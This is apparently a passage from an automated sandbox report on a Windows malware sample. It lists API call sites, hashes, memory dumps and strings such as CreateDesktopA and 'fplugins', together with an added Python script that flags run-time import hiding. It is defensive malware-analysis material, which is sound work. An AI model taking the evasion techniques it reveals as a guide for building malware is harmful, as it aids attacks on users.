                                • Instruction ID: 37b11ae368b478a8db70004d5f87d5dfcdd2b6bbc9ca52bfc41208516ae5e2e2
                                • Opcode Fuzzy Hash: 910793246775f96d9d179f0d530787c4dd868347895947cdecb40da5659dc617
                                • Instruction Fuzzy Hash: B231CC29B8426D769620EBEF4CC7F7F6F56FF85BA0B034056B608575808DE25504CAB2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006E2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 006E2A8A
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 116e71f96ce2431bb03243b02d7be6cff46e421051e3766062860f9d3eec9842
                                • Instruction ID: 5bdd28c600e3016053af4d428cf1d440c8cfa12be83935f1a03c503ae628dc0f
                                • Opcode Fuzzy Hash: 116e71f96ce2431bb03243b02d7be6cff46e421051e3766062860f9d3eec9842
                                • Instruction Fuzzy Hash: 6BF0B4B1A40644EFC700DF98DD49FAEBBBCF744B21F100226F915E3280D7741904C6A1

                                 Control-flow Graph (rendered graph not recoverable from text)
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00F05450), ref: 006E66F5
                                • GetProcAddress.KERNEL32(76210000,00F05610), ref: 006E670D
                                • GetProcAddress.KERNEL32(76210000,00F19060), ref: 006E6726
                                • GetProcAddress.KERNEL32(76210000,00F19078), ref: 006E673E
                                • GetProcAddress.KERNEL32(76210000,00F19018), ref: 006E6756
                                • GetProcAddress.KERNEL32(76210000,00F1E9F0), ref: 006E676F
                                • GetProcAddress.KERNEL32(76210000,00F0A7F0), ref: 006E6787
                                • GetProcAddress.KERNEL32(76210000,00F1EB28), ref: 006E679F
                                • GetProcAddress.KERNEL32(76210000,00F1E918), ref: 006E67B8
                                • GetProcAddress.KERNEL32(76210000,00F1E930), ref: 006E67D0
                                • GetProcAddress.KERNEL32(76210000,00F1EA08), ref: 006E67E8
                                • GetProcAddress.KERNEL32(76210000,00F054B0), ref: 006E6801
                                • GetProcAddress.KERNEL32(76210000,00F05570), ref: 006E6819
                                • GetProcAddress.KERNEL32(76210000,00F055D0), ref: 006E6831
                                • GetProcAddress.KERNEL32(76210000,00F05630), ref: 006E684A
                                • GetProcAddress.KERNEL32(76210000,00F1EA68), ref: 006E6862
                                • GetProcAddress.KERNEL32(76210000,00F1EAC8), ref: 006E687A
                                • GetProcAddress.KERNEL32(76210000,00F0A8B8), ref: 006E6893
                                • GetProcAddress.KERNEL32(76210000,00F05690), ref: 006E68AB
                                • GetProcAddress.KERNEL32(76210000,00F1EB40), ref: 006E68C3
                                • GetProcAddress.KERNEL32(76210000,00F1EAE0), ref: 006E68DC
                                • GetProcAddress.KERNEL32(76210000,00F1EC00), ref: 006E68F4
                                • GetProcAddress.KERNEL32(76210000,00F1EBE8), ref: 006E690C
                                • GetProcAddress.KERNEL32(76210000,00F056B0), ref: 006E6925
                                • GetProcAddress.KERNEL32(76210000,00F1EAF8), ref: 006E693D
                                • GetProcAddress.KERNEL32(76210000,00F1EA80), ref: 006E6955
                                • GetProcAddress.KERNEL32(76210000,00F1EA20), ref: 006E696E
                                • GetProcAddress.KERNEL32(76210000,00F1EA38), ref: 006E6986
                                • GetProcAddress.KERNEL32(76210000,00F1EAB0), ref: 006E699E
                                • GetProcAddress.KERNEL32(76210000,00F1E990), ref: 006E69B7
                                • GetProcAddress.KERNEL32(76210000,00F1EA50), ref: 006E69CF
                                • GetProcAddress.KERNEL32(76210000,00F1E948), ref: 006E69E7
                                • GetProcAddress.KERNEL32(76210000,00F1E9A8), ref: 006E6A00
                                • GetProcAddress.KERNEL32(76210000,00F0FB70), ref: 006E6A18
                                • GetProcAddress.KERNEL32(76210000,00F1EBD0), ref: 006E6A30
                                • GetProcAddress.KERNEL32(76210000,00F1E9C0), ref: 006E6A49
                                • GetProcAddress.KERNEL32(76210000,00F056D0), ref: 006E6A61
                                • GetProcAddress.KERNEL32(76210000,00F1EA98), ref: 006E6A79
                                • GetProcAddress.KERNEL32(76210000,00F056F0), ref: 006E6A92
                                • GetProcAddress.KERNEL32(76210000,00F1E960), ref: 006E6AAA
                                • GetProcAddress.KERNEL32(76210000,00F1E9D8), ref: 006E6AC2
                                • GetProcAddress.KERNEL32(76210000,00F05370), ref: 006E6ADB
                                • GetProcAddress.KERNEL32(76210000,00F05390), ref: 006E6AF3
                                • LoadLibraryA.KERNEL32(00F1EB10,006E051F), ref: 006E6B05
                                • LoadLibraryA.KERNEL32(00F1E978), ref: 006E6B16
                                • LoadLibraryA.KERNEL32(00F1EB58), ref: 006E6B28
                                • LoadLibraryA.KERNEL32(00F1EB70), ref: 006E6B3A
                                • LoadLibraryA.KERNEL32(00F1EB88), ref: 006E6B4B
                                • LoadLibraryA.KERNEL32(00F1EBA0), ref: 006E6B5D
                                • LoadLibraryA.KERNEL32(00F1EBB8), ref: 006E6B6F
                                • LoadLibraryA.KERNEL32(00F1ED38), ref: 006E6B80
                                • GetProcAddress.KERNEL32(751E0000,00F050F0), ref: 006E6B9C
                                • GetProcAddress.KERNEL32(751E0000,00F1EDF8), ref: 006E6BB4
                                • GetProcAddress.KERNEL32(751E0000,00F18B10), ref: 006E6BCD
                                • GetProcAddress.KERNEL32(751E0000,00F1EE28), ref: 006E6BE5
                                • GetProcAddress.KERNEL32(751E0000,00F05010), ref: 006E6BFD
                                • GetProcAddress.KERNEL32(738C0000,00F0A688), ref: 006E6C1D
                                • GetProcAddress.KERNEL32(738C0000,00F05290), ref: 006E6C35
                                • GetProcAddress.KERNEL32(738C0000,00F0A890), ref: 006E6C4E
                                • GetProcAddress.KERNEL32(738C0000,00F1EDB0), ref: 006E6C66
                                • GetProcAddress.KERNEL32(738C0000,00F1EDC8), ref: 006E6C7E
                                • GetProcAddress.KERNEL32(738C0000,00F05090), ref: 006E6C97
                                • GetProcAddress.KERNEL32(738C0000,00F05150), ref: 006E6CAF
                                • GetProcAddress.KERNEL32(738C0000,00F1EC78), ref: 006E6CC7
                                • GetProcAddress.KERNEL32(753A0000,00F05030), ref: 006E6CE3
                                • GetProcAddress.KERNEL32(753A0000,00F05330), ref: 006E6CFB
                                • GetProcAddress.KERNEL32(753A0000,00F1ECF0), ref: 006E6D14
                                • GetProcAddress.KERNEL32(753A0000,00F1EC30), ref: 006E6D2C
                                • GetProcAddress.KERNEL32(753A0000,00F04F70), ref: 006E6D44
                                • GetProcAddress.KERNEL32(76310000,00F0A570), ref: 006E6D64
                                • GetProcAddress.KERNEL32(76310000,00F0A5C0), ref: 006E6D7C
                                • GetProcAddress.KERNEL32(76310000,00F1ED08), ref: 006E6D95
                                • GetProcAddress.KERNEL32(76310000,00F050B0), ref: 006E6DAD
                                • GetProcAddress.KERNEL32(76310000,00F04F90), ref: 006E6DC5
                                • GetProcAddress.KERNEL32(76310000,00F0A5E8), ref: 006E6DDE
                                • GetProcAddress.KERNEL32(76910000,00F1ED20), ref: 006E6DFE
                                • GetProcAddress.KERNEL32(76910000,00F05110), ref: 006E6E16
                                • GetProcAddress.KERNEL32(76910000,00F18AF0), ref: 006E6E2F
                                • GetProcAddress.KERNEL32(76910000,00F1ED68), ref: 006E6E47
                                • GetProcAddress.KERNEL32(76910000,00F1EC90), ref: 006E6E5F
                                • GetProcAddress.KERNEL32(76910000,00F05050), ref: 006E6E78
                                • GetProcAddress.KERNEL32(76910000,00F05070), ref: 006E6E90
                                • GetProcAddress.KERNEL32(76910000,00F1ED98), ref: 006E6EA8
                                • GetProcAddress.KERNEL32(76910000,00F1EC48), ref: 006E6EC1
                                • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 006E6ED7
                                • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 006E6EEE
                                • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 006E6F05
                                • GetProcAddress.KERNEL32(75B30000,00F051D0), ref: 006E6F21
                                • GetProcAddress.KERNEL32(75B30000,00F1ED80), ref: 006E6F39
                                • GetProcAddress.KERNEL32(75B30000,00F1EC60), ref: 006E6F52
                                • GetProcAddress.KERNEL32(75B30000,00F1ED50), ref: 006E6F6A
                                • GetProcAddress.KERNEL32(75B30000,00F1EDE0), ref: 006E6F82
                                • GetProcAddress.KERNEL32(75670000,00F050D0), ref: 006E6F9E
                                • GetProcAddress.KERNEL32(75670000,00F051F0), ref: 006E6FB6
                                • GetProcAddress.KERNEL32(76AC0000,00F05130), ref: 006E6FD2
                                • GetProcAddress.KERNEL32(76AC0000,00F1EE10), ref: 006E6FEA
                                • GetProcAddress.KERNEL32(6F4E0000,00F052B0), ref: 006E700A
                                • GetProcAddress.KERNEL32(6F4E0000,00F04FB0), ref: 006E7022
                                • GetProcAddress.KERNEL32(6F4E0000,00F05170), ref: 006E703B
                                • GetProcAddress.KERNEL32(6F4E0000,00F1EED0), ref: 006E7053
                                • GetProcAddress.KERNEL32(6F4E0000,00F05310), ref: 006E706B
                                • GetProcAddress.KERNEL32(6F4E0000,00F05270), ref: 006E7084
                                • GetProcAddress.KERNEL32(6F4E0000,00F05230), ref: 006E709C
                                • GetProcAddress.KERNEL32(6F4E0000,00F052F0), ref: 006E70B4
                                • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 006E70CB
                                • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 006E70E2
                                • GetProcAddress.KERNEL32(75AE0000,00F1EE40), ref: 006E70FE
                                • GetProcAddress.KERNEL32(75AE0000,00F18C60), ref: 006E7116
                                • GetProcAddress.KERNEL32(75AE0000,00F1EE58), ref: 006E712F
                                • GetProcAddress.KERNEL32(75AE0000,00F1EE70), ref: 006E7147
                                • GetProcAddress.KERNEL32(76300000,00F05190), ref: 006E7163
                                • GetProcAddress.KERNEL32(6D380000,00F1EEA0), ref: 006E717F
                                • GetProcAddress.KERNEL32(6D380000,00F051B0), ref: 006E7197
                                • GetProcAddress.KERNEL32(6D380000,00F1EE88), ref: 006E71B0
                                • GetProcAddress.KERNEL32(6D380000,00F1EEB8), ref: 006E71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: c9af724fa137b11aca247ebd70519d02282791e15647946a6da99b64f5a55375
                                • Instruction ID: 0690f0a266b25dd00250afb6ea38a9f8f8a46a76fe7094927bf42a3216d6f3ad
                                • Opcode Fuzzy Hash: c9af724fa137b11aca247ebd70519d02282791e15647946a6da99b64f5a55375
                                • Instruction Fuzzy Hash: 13620AB5611A00EFD754DF79EC88E363BBAF7886413108919E996C3364EF34A881DF64
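The function above resolves its imports at run time: a run of LoadLibraryA calls followed by dozens of GetProcAddress calls against a handful of module handles, with only five export names rendered in plaintext (CreateDesktopA, OpenDesktopA, CloseDesktop, InternetSetOptionA, HttpQueryInfoA); for the rest the report shows only the pointer passed as the name argument, so the resolved API is not visible in the listing. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses listing lines of this shape and summarises dynamic import resolution per module handle, so a reviewer can see at a glance how many names were hidden and which were not. The sample lines are copied from the listing above; the report does not say which DLL each handle value (76210000, 76910000, 6F4E0000) belongs to, so the code does not assume a mapping, and the thresholds in hides_imports() are this example's own heuristic rather than values the sandbox uses.

```python
"""Summarise run-time import resolution from a Joe Sandbox per-function API listing.

Added example for this page; not Joe Sandbox code and not code from the sample.
The listing records only the module *handle* passed to GetProcAddress, not the
DLL it refers to, so results are grouped by handle value.
"""
import re
from collections import defaultdict

# One listing line, in any of the shapes seen in the report:
#   • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 006E6ED7
#   • wsprintfA.USER32 ref: 006E283B
#     • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)"      # API name and the DLL that exports it
    r"(?:\((?P<args>[^)]*)\))?,?\s*"      # optional argument list
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)"       # call-site address
)
HEX_DWORD = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed sample: a subset of lines copied from the listing above.
SAMPLE_LISTING = """\
• GetProcAddress.KERNEL32(76210000,00F1EB40), ref: 006E68C3
• GetProcAddress.KERNEL32(76210000,00F1EAE0), ref: 006E68DC
• LoadLibraryA.KERNEL32(00F1EB10,006E051F), ref: 006E6B05
• LoadLibraryA.KERNEL32(00F1E978), ref: 006E6B16
• GetProcAddress.KERNEL32(76910000,00F1ED20), ref: 006E6DFE
• GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 006E6ED7
• GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 006E6EEE
• GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 006E6F05
• GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 006E70CB
• GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 006E70E2
• wsprintfA.USER32 ref: 006E283B
  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
"""


def parse_api_lines(text):
    """Return one dict per recognised line: api, module, args, ref, subcall."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            # Lines attributed to a callee rather than this function's own call sites
            "subcall": "Part of subcall function" in line,
        })
    return calls


def summarise_dynamic_imports(calls):
    """Group GetProcAddress calls by module handle.

    The name argument is either a readable export name, or a raw pointer value,
    in which case the listing does not show which export was resolved. An
    8-hex-digit string is treated as a pointer; no Win32 export name has that shape.
    """
    by_handle = defaultdict(lambda: {"plaintext": [], "pointer": 0})
    loadlibrary = 0
    for c in calls:
        if c["subcall"]:
            continue  # count only this function's own call sites
        if c["api"] == "LoadLibraryA":
            loadlibrary += 1
        elif c["api"] == "GetProcAddress" and len(c["args"]) == 2:
            handle, name = c["args"]
            if HEX_DWORD.match(name):
                by_handle[handle]["pointer"] += 1
            else:
                by_handle[handle]["plaintext"].append(name)
    return {"loadlibrary_calls": loadlibrary, "by_handle": dict(by_handle)}


def hides_imports(summary, min_resolved=20, min_pointer_ratio=0.8):
    """Assumed thresholds for flagging a function as hiding its imports:
    many resolutions, and most of them with the export name not visible."""
    pointer = sum(h["pointer"] for h in summary["by_handle"].values())
    plaintext = sum(len(h["plaintext"]) for h in summary["by_handle"].values())
    total = pointer + plaintext
    if total == 0:
        return False
    return total >= min_resolved and pointer / total >= min_pointer_ratio


if __name__ == "__main__":
    summary = summarise_dynamic_imports(parse_api_lines(SAMPLE_LISTING))
    for handle, h in summary["by_handle"].items():
        print(handle, "hidden:", h["pointer"], "visible:", h["plaintext"])
    print("hides imports:", hides_imports(summary))
```

On the full listing above the same pass counts well over twenty resolutions with only five visible names, which is what the report's "Extensive use of GetProcAddress" signature is reacting to; the plaintext names (desktop creation and WinINet option/query calls) are the ones worth pivoting on when the hidden ones cannot be recovered from the dump.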
                                APIs
                                • lstrlen.KERNEL32(006ECFEC), ref: 006DF1D5
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF1F1
                                • lstrlen.KERNEL32(006ECFEC), ref: 006DF1FC
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF215
                                • lstrlen.KERNEL32(006ECFEC), ref: 006DF220
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF239
                                • lstrcpy.KERNEL32(00000000,006F4FA0), ref: 006DF25E
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF28C
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF2C0
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF2F0
                                • lstrlen.KERNEL32(00F05550), ref: 006DF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 1695e2957d720ea84cb84840174dba7b451fea5d1d86921e4effd5121bd22e28
                                • Instruction ID: c994e8a91547e1c4866e22605a2e5b5e9442018ec516abf7a3b9ff1c702e60be
                                • Opcode Fuzzy Hash: 1695e2957d720ea84cb84840174dba7b451fea5d1d86921e4effd5121bd22e28
                                • Instruction Fuzzy Hash: 60A21770D016069FCB60DF76D948AAAB7F6BF44314B19807EE84ADB361DB35D842CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0013
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E00BD
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E00E1
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E00EC
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0110
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E011B
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E013F
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E015A
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0189
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E0194
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E01C3
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E01CE
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0206
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E0250
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E059B
                                • lstrlen.KERNEL32(00F054F0), ref: 006E05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 006E05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E060E
                                • lstrlen.KERNEL32(00F20478), ref: 006E0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E064C
                                • lstrcat.KERNEL32(00000000,?), ref: 006E0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E0681
                                • lstrlen.KERNEL32(00F054D0), ref: 006E0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 006E06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E0706
                                • lstrcpy.KERNEL32(00000000,00F18C10), ref: 006E074B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E077F
                                • lstrcpy.KERNEL32(00000000,00F20688), ref: 006E07E7
                                • lstrcpy.KERNEL32(00000000,00F18A20), ref: 006E0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 006E08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E0928
                                • lstrcpy.KERNEL32(00000000,00F18A10), ref: 006E09F8
                                  • Part of subcall function 006C24E0: lstrcpy.KERNEL32(00000000,?), ref: 006C2528
                                  • Part of subcall function 006C24E0: lstrcpy.KERNEL32(00000000,?), ref: 006C254E
                                  • Part of subcall function 006C24E0: lstrcpy.KERNEL32(00000000,?), ref: 006C2577
                                • lstrcpy.KERNEL32(00000000,00F18A60), ref: 006E0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E0B81
                                • lstrcpy.KERNEL32(00000000,00F18A60), ref: 006E0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 80d1183af7b2cc7c9589ec036435baec497eaa7747fe5b84f0f10d7ae0e2215e
                                • Instruction ID: 0cbc8236179f8760609a6cfeefa85d10ae9cf2011c3a462377aedc8a812fedd3
                                • Opcode Fuzzy Hash: 80d1183af7b2cc7c9589ec036435baec497eaa7747fe5b84f0f10d7ae0e2215e
                                • Instruction Fuzzy Hash: BBE24E709063818FD774DF2AC488BAAB7E2BF89314F58856DD48D8B352DB71D885CB42
                                APIs
                                • lstrlen.KERNEL32(00F05550), ref: 006DF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DF47B
                                • lstrcpy.KERNEL32(00000000,00F05550), ref: 006DF4BB
                                • lstrcpy.KERNEL32(00000000,00F18B00), ref: 006DF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006DF61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006DF718
                                • lstrlen.KERNEL32(00F18AC0), ref: 006DF746
                                • lstrcpy.KERNEL32(00000000,00F18AC0), ref: 006DF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006DFA32
                                • lstrlen.KERNEL32(00F18BB0), ref: 006DFA60
                                • lstrcpy.KERNEL32(00000000,00F18BB0), ref: 006DFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 0f019b696fef9ae60c57f2989abfb148073053a1a60cd66265336c49ab27088c
